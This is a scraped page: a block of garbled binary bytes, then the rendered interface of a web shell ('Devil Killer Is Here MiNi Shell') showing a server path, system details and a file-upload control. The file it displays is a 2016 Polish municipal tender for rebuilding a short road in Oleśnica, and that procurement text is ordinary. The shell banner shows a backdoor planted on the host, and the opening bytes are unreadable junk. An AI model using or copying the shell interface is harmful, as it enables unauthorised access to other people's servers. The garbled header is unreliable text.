JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/93386-N-2016.html

<p class="kh_header"><b>Oleśnica: Przebudowa odcinka drogi gminnej na działce nr 1602 w miejscowości Oleśnica</b><br>
<b>Numer ogłoszenia: 93386 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Oleśnica , ul. Nadstawie 1, 28-220 Oleśnica, woj. świętokrzyskie, tel. 041 3774036, 3774009, faks 041 3774036.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaolesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa odcinka drogi gminnej na działce nr 1602 w miejscowości Oleśnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie obejmuje przebudowę drogi w miejscowości Oleśnica na odcinku o dł. 130 mb oraz wykonanie wszystkich prac gwarantujących prawidłowe zrealizowanie przedmiotu zamówienia, zgodnie z opisem przedmiotu zamówienia - Załącznik Nr  9 do SIWZ.
Przebudowa drogi na działce o nr ewid. 1602 będzie polegała na wykonaniu: korytowania mechanicznie na głębokość 30 cm, warstwy dolnej podbudowy z kruszyw łamanych gr. 15 cm, warstwy  górnej podbudowy z kruszyw łamanych gr. 10 cm, wyrównania podbudowy mieszanką mineralno- bitumiczną śr. 75kg/m2, nawierzchni z mieszanki mineralno-bitumicznej asfaltowej o grubości 3cm (warstwa ścieralna), uzupełnienia poboczy materiałem kamiennym gr. min. 6 cm. Całkowita długość przebudowywanego odcinka drogi wynosi 130 mb, szerokość 2,5 m, szerokość poboczy 0,50 m. Przedmiot zamówienia obejmuje również:
a) zapewnienie właściwego zabezpieczenia, ogrodzenia i oznakowania terenu budowy;
b) obsługę geodezyjną wraz z inwentaryzacją powykonawczą,
c) uporządkowanie terenu budowy i przekazanie go Zamawiającemu w dniu odbioru  końcowego robót,
d) pełną odpowiedzialność, którą ponosi Wykonawca za naruszenie przepisów dotyczących ochrony środowiska na terenie budowy i na terenie przyległym do terenu budowy oraz postępowania z odpadami w stopniu całkowicie zwalniającym od tej odpowiedzialności  Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 600,00 zł (słownie złotych: sześćset 00/100), wniesionym do Zamawiającego przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku formach, określonych w art. 45 ust.6 ustawy Pzp, tj.
- w pieniądzu, 
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych, 
- gwarancjach ubezpieczeniowych, 
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, uwzględniając zapisy art. 26 ust. 3 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego posiadania wiedzy i doświadczenia Zamawiający wymaga wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonej co najmniej 1 roboty budowlanej obejmującej budowę lub przebudowę drogi o nawierzchni asfaltowej o wartości brutto min. 20 000,00 zł. 
Na potwierdzenie spełniania niniejszego warunku wykonawcy złożą określone w ogłoszeniu i w SIWZ oświadczenia lub dokumenty. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww. warunek. 
Zamawiający dokona oceny spełniania warunku na podstawie złożonych oświadczeń lub dokumentów, uwzględniając zapisy art. 26 ust. 3 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, uwzględniając zapisy art. 26 ust. 3 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego osób zdolnych do wykonania zamówienia zamawiający wymaga dysponowania osobą (kierownik budowy) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej.
W zakresie określonych uprawnień budowlanych dopuszcza się odpowiadające im:
- ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
- kwalifikacje zawodowe uprawniające do wykonywania samodzielnych funkcji technicznych w budownictwie wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu EFTA - stron umowy o Europejskim Obszarze Gospodarczym, z zastrzeżeniem art. 12 a i innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63, poz. 394). 
Na potwierdzenie spełniania niniejszego warunku wykonawcy złożą określone w ogłoszeniu i SIWZ oświadczenia lub dokumenty. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww. warunek.
Zamawiający dokona oceny spełniania warunku na podstawie złożonych oświadczeń lub dokumentów, uwzględniając zapisy art. 26 ust. 3 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, uwzględniając zapisy art. 26 ust. 3 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz oferty wg Załącznika Nr 1 do SIWZ wraz z kosztorysem ofertowym sporządzonym  jako  kalkulacja  własna  na  podstawie  dokumentacji  technicznej,  (kosztorys ofertowy z wartością robót, stanowiącą cenę zamówienia określoną w ofercie  ma  charakter pomocniczy). Jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych  podmiotów,  niezależnie  od  charakteru  prawnego  łączących  go  z nimi  stosunków. Wykonawca  w  takiej  sytuacji  zobowiązany  jest  udowodnić  zamawiającemu,  iż  będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w  tym  celu  pisemne  zobowiązanie  tych  podmiotów  do  oddania  mu  do  dyspozycji 
niezbędnych zasobów na potrzeby wykonania zamówienia. Pełnomocnictwo, określające jego zakres  w  przypadku,  gdy  Wykonawcę  reprezentuje pełnomocnik.  Pełnomocnictwo  do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w  postępowaniu  i  zawarcia  umowy  w  sprawie  zamówienia  publicznego  wykonawców występujących  wspólnie  w  przypadku  wspólnego  ubiegania  się  o  udzielenie  niniejszego zamówienia. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku składania oferty  przez  wykonawców  występujących  wspólnie,  wykonawcy  ustanowią pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o  udzielenie  zamówienia  albo reprezentowania  w  postępowaniu  i  zawarcia  umowy  w  sprawie  zamówienia  publicznego. Przepisy  dotyczące  wykonawcy  stosuje  się  odpowiednio  do  wykonawców  wspólnie ubiegających się o udzielenie zamówienia. Jeżeli oferta wykonawców wspólnie ubiegających się  o  udzielenie  zamówienia  została  wybrana  zamawiający  może  żądać  przed  zawarciem umowy  w  sprawie  zamówienia  publicznego,  umowy  regulującej  współpracę  tych wykonawców.  Wykonawcy  występujący  wspólnie  ponoszą  solidarną  odpowiedzialność  za wykonanie  umowy.  Każdy  oddzielnie  z  Wykonawców  występujących  wspólnie  nie  może podlegać  wykluczeniu  z  postępowania  na  podstawie  art.  24 ust.1  i  2  Pzp.  Wykonawcy 
występujący  wspólnie  muszą  łącznie  spełniać warunki,  o  których  mowa  w  art.  22  ust.  1 ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Gwarancja i rękojmia na przedmiot umowy - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą być dokonywane jedynie w sposób zgodny z przepisami Ustawy Prawo zamówień publicznych (art. 144) i mogą być wprowadzane w przypadku: 1) konieczności dokonania zmian projektowych, które są niezbędne dla prawidłowego wykonania przedmiotu umowy,    wprowadzanych    w    trybie    nadzoru autorskiego    przeprowadzonego    zgodnie z  przepisami  Prawa  Budowlanego  lub  usuwania  błędów  w  tej  dokumentacji;  2)  ponadto Zamawiający  przewiduje  możliwość  wprowadzania  zmian  w  przypadku  wystąpienia  co najmniej  jednej  z  okoliczności  wymienionych  poniżej,  z  uwzględnieniem  podawanych warunków ich wprowadzenia: a) zmiana terminu wykonania umowy: -zmiany spowodowane 
warunkami  atmosferycznymi,  w  szczególności:  klęski  żywiołowe;  warunki  atmosferyczne uniemożliwiające  prowadzenie  robót  budowlanych, przeprowadzanie  prób  i  sprawdzeń, dokonywanie   odbiorów,  w  szczególności: temperatury powietrza  poniżej 0 st. C,   wiatr uniemożliwiający  pracę  maszyn  budowlanych,  gwałtowne  opady  deszczu  (oberwanie chmury),  gradobicie,  burze  z wyładowaniami  atmosferycznymi, - zmiany  spowodowane okolicznościami  nieprzewidywalnymi i  niezależnymi  od  stron  umowy,  w  szczególności: niewypały  i  niewybuchy,  wykopaliska  archeologiczne,  odmienne  od  przyjętych w  dokumentacji  przedstawionej  przez  Zamawiającego  warunki  geologiczne  (kategorie gruntu,  kurzawka,  głazy  narzutowe  itp.),  odmienne  od  przyjętych  w  dokumentacji przedstawionej  przez  Zamawiającego  warunki  terenowe,  w szczególności  istnienie podziemnych sieci, instalacji, urządzeń lub nie zinwentaryzowanych obiektów budowlanych (bunkry,  fundamenty,  ściany  szczelne  itp.), - zmiany  będące  następstwem  okoliczności leżących  po  stronie Zamawiającego,  w  szczególności:  nieterminowe  przekazanie  terenu budowy przez Zamawiającego; wstrzymanie robót przez Zamawiającego; wykonanie przez Zamawiającego robót budowlanych lub dostaw bez realizacji których Wykonawca nie może w sposób należyty wykonywać przedmiotu umowy, z przekroczeniem terminów wskazanych dla wykonania tych robót lub dostaw; konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji umowy, w szczególności w projekcie budowlanym i przedmiarach robót; - zmiany będące następstwem działania organów administracji, w szczególności: odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji dostarczonej przez Zamawiającego; - inne  przyczyny zewnętrzne niezależne  od  Zamawiającego  oraz  Wykonawcy  skutkujące  niemożliwością  prowadzenia prac, w szczególności: brak możliwości dojazdu oraz transportu materiałów na teren budowy 
spowodowany  awariami,  remontami  lub  przebudowami  dróg  dojazdowych;  protesty mieszkańców;  przerwa  w  dostawie  energii  elektrycznej,  wody,  gazu; -zmiany  terminu wykonania  przedmiotu  umowy  w  przypadku  konieczności wykonania  zamówienia dodatkowego  lub  uzupełniającego; - Zamawiający dopuszcza  możliwość  przedłużenia terminu  wykonania umowy, mimo, iż opóźnienie w wykonaniu umowy będzie następstwem okoliczności,  za  które  odpowiada Wykonawca,  jeżeli:  Wykonawca  powiadomi Zamawiającego  najpóźniej  na  20  dni  przed  upływem  terminu  wykonania  umowy o  niemożliwości  ukończenia  robót  w  tej  dacie;  Wykonawca  zaproponuje  nowy  termin wykonania  umowy; Wykonawca  zaproponuje  Zamawiającemu  zrekompensowanie powstałego  opóźnienia,  w  tym  przez  przedłużenie  okresu  gwarancji.  W  takim  przypadku wartość umowy może zostać obniżona o kwotę nie mniejszą niż równowartość połowy kar umownych,  które  Wykonawca  byłby  zobowiązany  zapłacić  Zamawiającemu  za  takie opóźnienie,  lecz  niższą  niż  kwota  tych  kar; - w  przypadku  wystąpienia  którejkolwiek z okoliczności wymienionych powyżej termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do wykonania przedmiotu umowy w sposób należyty, nie dłużej  jednak  niż  o  okres  trwania  tych  okoliczności.  b)  Zmiana  sposobu  spełnienia świadczenia  umowy: - zmiany  technologiczne,  w  szczególności:  niedostępność  na  rynku materiałów lub urządzeń wskazanych w dokumentacji umowy, w szczególności w projekcie budowlanym,   a   spowodowana   zaprzestaniem   produkcji   lub   wycofaniem   z   rynku   tych materiałów lub urządzeń; pojawienie się na rynku materiałów lub urządzeń nowszej generacji 
pozwalających  na  zaoszczędzenie  kosztów  realizacji  przedmiotu  Umowy  lub  kosztów eksploatacji wykonanego przedmiotu umowy; pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji umowy lub kosztów wykonywanych robót, jak również kosztów eksploatacji wykonanego przedmiotu umowy, konieczność   zrealizowania   umowy   przy   zastosowaniu   innych   rozwiązań technicznych/technologicznych  lub materiałowych  niż  wskazane  w  dokumentach  umowy, w szczególności w projekcie  budowlanym  w  sytuacji,  gdyby  zastosowanie  przewidzianych rozwiązań  groziło  niewykonaniem  lub  wadliwym  wykonaniem  umowy,  konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa, Zmiany, o których mowa w lit b) nie mogą 
stanowić  podstawy  zwiększenia  wartości  umowy,  z  zastrzeżeniem  postanowień  zdania następnego. Wartość umowy może ulec podwyższeniu o kwotę stanowiącą równowartość kosztów poniesionych w związku z wprowadzeniem zmian, o których mowa w tirecie drugim lub trzecim, jeżeli w okresie gwarancji, oszczędności w kosztach eksploatacji przedmiotu umowy,  uzyskane  na  skutek  wprowadzenia  tych  zmian,  przewyższą  kwotę  tej  podwyżki. Zwiększona wartość umowy w tej części (podwyżka) będzie wypłacona dopiero po okresie gwarancji. Zmiany wskazywane w tirecie czwartym i piątym będą wprowadzane wyłącznie w  zakresie  umożliwiającym  oddanie  przedmiotu  umowy  do  użytkowania,  a  Zamawiający może ponieść ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom. Każda ze wskazywanych w tym punkcie zmian 
może  być  powiązana  z  obniżeniem  wartości  umowy. - zmiany  osobowe:  zmiana  osób, będących personelem Wykonawcy wskazanym w ofercie, przy pomocy których Wykonawca realizuje  przedmiot  umowy,  na  inne  legitymujące  się  co  najmniej  równoważnymi uprawnieniami,  na  zasadach  określonych  w  niniejszej  umowie;  zmiana  albo  rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się, na zasadach określonych w  art.  26  ust.2b  Pzp,  w  celu  wykazania  spełniania  warunków  udziału  w  postępowaniu, o których mowa w art. 22 ust. 1 Pzp, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu  nie 
mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. c) pozostałe zmiany:  siła  wyższa  uniemożliwiająca  wykonanie  przedmiotu  umowy  zgodnie  z  umową; zmiana  sposobu  rozliczania  umowy  lub  dokonywania  płatności  na  rzecz  Wykonawcy  na skutek  zmian  zawartej  przez  zamawiającego  umowy  o  dofinansowanie  projektu  lub wytycznych  dotyczących  realizacji  projektu;  rezygnacja  przez  zamawiającego  z  realizacji części przedmiotu umowy. W takim przypadku wartość umowy przysługująca wykonawcy zostanie 
pomniejszona, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia 
oraz  udokumentowane  koszty,  które  wykonawca  poniósł  w  związku  z wynikającymi z  umowy  planowanymi  świadczeniami,  zmiany  uzasadnione  okolicznościami,  o  których mowa   w   art.   3571   Kc z  uwzględnieniem  faktu,  że  za  rażącą  zostanie  uznana  strata w wysokości, o której mowa w art. 397 ksh</p>
